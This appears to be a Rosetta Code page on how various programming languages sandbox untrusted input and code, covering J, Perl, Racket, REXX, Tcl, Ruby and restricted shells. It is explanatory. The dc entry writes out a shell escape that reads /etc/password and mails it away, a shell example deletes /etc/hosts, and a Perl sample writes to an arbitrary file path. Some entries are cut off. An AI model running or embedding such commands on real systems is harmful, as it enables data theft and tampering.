Sometimes it is useful to run code with inputs from untrusted users, untrusted code, etc. Explain and demonstrate the features your language uses for dealing with untrusted input and untrusted code. Explain possible compromises, weaknesses and exploits that may be available through the language (for example forcing execution of something outside of the application) as a result of using untrusted data sources.
The intention is that the definition is to be interpreted broadly; different languages will solve this task in very different ways and with (generally) incomparable results.
C is a double edged sword. It was designed to allow programmers to do virtually anything and everything. The ability to access memory at the bit level, embed assembly directly and yet be readable ( or unreadable ) by humans, resulted in a language which forms the foundation of the world as we know it.
In other words, there is no check. Users and programmers can do anything they want. There is no sandbox, no off-limits area. Unless it is explicitly forbidden by the compiler or the operating system, a C program without sufficient and necessary checks will result in 'unintended and unforeseen' consequences with the 'appropriate' inputs.
On the bright side, programming in C disciplines the programmer, nothing like a grueling boot camp or war time conscription to make one appreciate the niceties of a Java, Perl, Python or Haskell.
But try writing an operating system with them...
With great power, comes great responsibility. :)
Beware of allowing user input to fed to the reverse polish calculator. It has the ability to run shell commands, and this could be a security risk:
`!'cat /etc/password|mail [email protected]
J has some security mechanisms built in, and they are detailed below. But to understand their scope (and limitations), it's probably helpful to provide some context first.
J is a function-level language, expressed with composition of primitive words, like + for plus and ! for factorial and @ for function-composition and / for reduce, etc.
Because J is also (mostly) functional, almost all of these primitive words are also "native": that is, they stay within the bounds of the execution environment, and cannot reach outside of it to the host system. They cannot even effect J's own memory space, except through assigning variables.
In fact, there is only one word which can reach outside the execution environment (the functional scope of the program): !:, the aptly named "foreign" operator. This one operator encapsulates all access to the outside world, and even the "behind the scenes world" of J's own memory space.
The operator takes two arguments and derives a function, which specifies which kind of foreign interface you want. For example, 1!:1 is the specific function to read a file, and 1!:2 is the function to write one (as in 1!:1 'filename' and some_data 1!:2 'filename', respectively). The foreign function 15!:0 allows the J programmer to call a shared library (dll, so, dylib, etc), 2!:5 reads environment variables (e.g. 2!:5'PATH'), and 2!:55 will terminate the program (quit, die: the mnemonic is that 255 is the "last" value of a byte, and 2!:55 is the "last" thing you want to do in a J program). There are many more, grouped into families (the first argument to !: specifies which family you want, e.g. 1!:n is the file family, and 1!:1 is specifically the file read function).
But the key thing is that this one operator, !:, controls all the dangerous stuff, so if we want to prevent dangerous stuff, we only have to put guards in one place. And, in fact, we have "foreign controls": foreign functions which themselves control which foreign functions are allowed. In other words, there's only one "door" to J, and we can lock it.
From the J documentation:
- 9!:25 y Security Level: The security level is either 0 or 1. It is initially 0, and may be set to 1 (and can not be reset to 0). When the security level is 1, executing Window driver commands and certain foreigns (!:) that can alter the external state cause a “security violation” error to be signalled. The following foreigns are prohibited: dyads 0!:n , 1!:n except 1!:40 , 1!:41, and 1!:42 , 2!:n , and 16!:n .
There are further foreign controls on how much space, or time, a single execution is allowed to take:
- 9!:33 y Execution Time Limit: The execution time limit is a single non-negative (possibly non-integral) number of seconds. The limit is reduced for every line of immediate execution that exceeds a minimum granularity, and execution is interrupted with a “time limit error” if a non-zero limit is set and goes to 0.
- 9!:21 y Memory Limit: An upper bound on the size of any one memory allocation. The memory limit is initially 2^30 on 32-bit systems and 2^62 on 64-bit systems.
With all that said, the language has seen limited use in contexts where code injection is a concern, so these mechanisms are rarely exercised (and somewhat dated).
GP has a default,
secure, which disallows the
extern commands. Once activated this default cannot be removed without input from the user (i.e., not a script).
default(secure,0); \\ Ineffective without user input
Perl can be invoked in taint mode with the command line option
-T. While in this mode input from the user, and all variables derived from it, cannot be used in certain contexts until 'sanitized' by being passed through a regular expression.
my $f = $ARGV;
open FILE, ">$f" or die 'Cannot open file for writing';
print FILE "Modifying an arbitrary file\n";
The racket/sandbox library provides a way to construct limited evaluators which are prohibited from using too much time, memory, read/write/execute files, using the network, etc.
(define e (make-evaluator 'racket))
(e '(...unsafe code...))
The idea is that a default sandbox is suitable for running arbitrary code without any of the usual risks. The library can also be used with many different configurations, to lift some of the restriction, which is more fitting in different cases.
Details for Regina REXX.
REXX is designed to assist in system scripting. Normally any command that is not a REXX instruction or user added command is passed to the operating system or default ADDRESS for evaluation.
Regina includes a RESTRICTED mode. This disables
- LINEOUT, CHAROUT, POPEN, RXFUNCADD BIFs
- "OPEN WRITE", "OPEN BOTH" subcommands of STREAM BIF
- The "built-in" environments eg. SYSTEM, CMD or PATH of ADDRESS command
- Setting the value of a variable in the external environment with VALUE BIF.
- Calling external functions
This mode is started from the command line with the -r option. When embedding Regina for use with application scripting the RexsStart API can have the RXRESTRICTED bit set in the CallType field.
By the way, BIF is short for Built In Function.
For example, given cat.rexx:
ADDRESS SYSTEM 'cat cat.rexx'
prompt$ regina cat.rexx ADDRESS SYSTEM 'cat cat.rexx' prompt$ regina -r cat.rexx 1 +++ ADDRESS SYSTEM 'cat cat.rexx' Error 95 running "/home/user/lang/rexx/cat.rexx", line 1: [Restricted feature used in "safe" mode] Error 95.5: [Running external commands invalid in "safe" mode]
Ruby handles untrusted input with the global variable
$SAFE. Settings higher than 0 invoke an increasing level of sandboxing and general paranoia.
$SAFE = 4
cgi = CGI::new("html4")
Tcl allows evaluation of untrusted code through safe interpreters, which are evaluation contexts where all unsafe operations are removed. This includes access to the filesystem, access to environment variables, opening of sockets, description of the platform, etc.
set context [interp create -safe]
$context eval $untrustedCode
Because the only way that Tcl code can perform an operation is by invoking a command, if that command is not present in the execution context then the functionality is gone.
It is possible to profile in restricted versions of operations to allow things like access to built-in packages.
set context [safe::interpCreate]
$context eval $untrustedCode
These work by installing aliases from the otherwise-removed commands in the safe interpreter to implementations of the commands in the parent master interpreter that take care to restrict what can be accessed. Note that the majority of unsafe operations are still not present, and the paths supported to the packages are virtualized; no hole is opened up for performing unsafe operations unless a package author is deliberately careless in their C implementation.
Enclose variable references in double quotes
Variable references should be contained in double quotes to prevent an empty string causing an error as a result of omission during evaluation:
# num=`expr $num + 1` # This may error if num is an empty string
num=`expr "$num" + 1` # The quotes are an improvement
Do not allow users to run programs that can launch a new shell
Traditional Unix provides a restricted mode shell (rsh) that does not allow the following operations:
- changing directory
- specifying absolute pathnames or names containing a slash
- setting the PATH or SHELL variable
- redirection of output
However, the restricted shell is not completely secure. A user can break out of the restricted environment by running a program that features a shell function. The following is an example of the shell function in vi being used to escape from the restricted shell:
Use a chroot jail
Sometimes chroot jails are used to add a layer of security to
setuid(9); # if 9 is the userid of a non-root user
rm /etc/hosts # actually points to ~/jail/etc/hosts
Basically, there is no trusted mode. If the OS lets you do it, you can. This means internet access, file system examination/modification, forking processes, pulling in arbitrary source code, compiling and running it, etc.